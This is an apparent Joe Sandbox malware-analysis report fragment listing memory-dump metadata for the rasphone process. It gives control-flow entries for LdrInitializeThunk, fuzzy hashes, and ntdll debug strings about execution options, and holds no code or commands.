                                                  • Instruction Fuzzy Hash: C190026136140542F90071584514B060045C7E3345F55C959E205E554DC639DC567136
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 73eda3413396c6f46379454e68d637dc776d6d4f4b54597b64439d1e745791f0
                                                  • Instruction ID: 00acd99af8240724d55b62cdb4da837f24c661428c6fc6d0d0acf81c50adb2fc
                                                  • Opcode Fuzzy Hash: 73eda3413396c6f46379454e68d637dc776d6d4f4b54597b64439d1e745791f0
                                                  • Instruction Fuzzy Hash: 88900221231C0142FA0075684D14B07004587D2347F55CA59A114E554CC935DC657531

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 279 48829f0-48829fc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 58efe443e9e8f4f0600817424050096ca1e216ab69709ad6f0eb829b3ab617fc
                                                  • Instruction ID: 216001d8353e20e09021a61e1266b89b17c7501b615be6ab8ffc62f980c80eaa
                                                  • Opcode Fuzzy Hash: 58efe443e9e8f4f0600817424050096ca1e216ab69709ad6f0eb829b3ab617fc
                                                  • Instruction Fuzzy Hash: 85900225231401032905B5580704507008687D7395355C965F200F550CD631DC657131

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 281 4882a80-4882a8c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bd1959480f764e65afb626820c3cd4e63210f9b834224476dcb7deb7c9e83126
                                                  • Instruction ID: 313b82c528e8cc617715be784e1e29d661080df0effd4cfa0a7a5531662281ac
                                                  • Opcode Fuzzy Hash: bd1959480f764e65afb626820c3cd4e63210f9b834224476dcb7deb7c9e83126
                                                  • Instruction Fuzzy Hash: ED90026122240103690571584514616404A87E2245B55C965E200E590DC535DC957135

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 282 4882ac0-4882acc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ef10b8b98df4ec5fb587209c60bf9cf102abb858b738d942f4d138b74d93bd0f
                                                  • Instruction ID: 2a4592af92780c7e2a95f471d8f45795a173ef95dffd7264acb97a7a25b5795a
                                                  • Opcode Fuzzy Hash: ef10b8b98df4ec5fb587209c60bf9cf102abb858b738d942f4d138b74d93bd0f
                                                  • Instruction Fuzzy Hash: C690023162540902F95071584514746004587D2345F55C955A101E654DC775DE5976B1

                                                  Control-flow Graph

                                                  control_flow_graph 280 4882a10-4882a1c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0

                                                  Control-flow Graph

                                                  control_flow_graph 285 4882b80-4882b8c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0

                                                  Control-flow Graph

                                                  control_flow_graph 286 4882b90-4882b9c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0

                                                  Control-flow Graph

                                                  control_flow_graph 287 4882bc0-4882bcc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0

                                                  Control-flow Graph

                                                  control_flow_graph 283 4882b00-4882b0c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0

                                                  Control-flow Graph

                                                  control_flow_graph 284 4882b10-4882b1c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0

                                                  Control-flow Graph

                                                  control_flow_graph 275 4882b2a-4882b2f 276 4882b3f-4882b46 LdrInitializeThunk 275->276 277 4882b31-4882b38 275->277
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Strings
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048B4507
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 048B4530
                                                  • ExecuteOptions, xrefs: 048B44AB
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 048B4592
                                                  • Execute=1, xrefs: 048B451E
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 048B454D
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 048B4460
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280